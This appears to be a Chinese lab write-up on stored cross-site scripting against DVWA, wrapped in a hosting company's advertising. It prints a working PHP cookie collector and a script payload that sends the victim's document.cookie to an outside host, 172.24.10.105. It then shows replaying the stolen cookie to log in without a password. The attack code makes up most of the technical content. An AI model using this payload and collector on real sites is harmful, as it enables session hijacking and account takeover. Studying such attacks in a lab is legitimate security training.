聲明:僅供交流使用,嚴禁違法犯罪,否則后果自負
創新互聯公司網站建設由有經驗的網站設計師、開發人員和項目經理組成的專業建站團隊,負責網站視覺設計、用戶體驗優化、交互設計和前端開發等方面的工作,以確保網站外觀精美、網站制作、網站設計易于使用并且具有良好的響應性。1,準備接收cookie的環境:
ip為172.24.10.105
代碼為:保存為 getCookie.php
<?php $cookie = $_GET['cookie']; $log = fopen("cookie.txt", "w"); fwrite($log, $cookie ."\n"); fclose($log); echo "***成功"; ?>
2,在實驗環境插入js代碼:
<script>document.location='http://172.24.10.105/getCookie.php?cookie='+document.cookie;</script>
通過審查元素把限制取消,然后插入js代碼
然后重新訪問這個頁面發現進行了跳轉
并在接收cookie的平臺看到了cookie
換一個瀏覽器設置cookie
直接訪問:
http://127.0.0.1/DVWA/
無需密碼登錄成功
歡迎關注微信公眾號
另外有需要云服務器可以了解下創新互聯scvps.cn,海內外云服務器15元起步,三天無理由+7*72小時售后在線,公司持有idc許可證,提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業上云的綜合解決方案,具有“安全穩定、簡單易用、服務可用性高、性價比高”等特點與優勢,專為企業上云打造定制,能夠滿足用戶豐富、多元化的應用場景需求。
本文題目:存儲型xss盜取cookie實驗-創新互聯
文章URL:http://m.newbst.com/article2/iogic.html
成都網站建設公司_創新互聯,為您提供網站建設、App設計、網站設計公司、品牌網站制作、網站制作、網站內鏈
聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯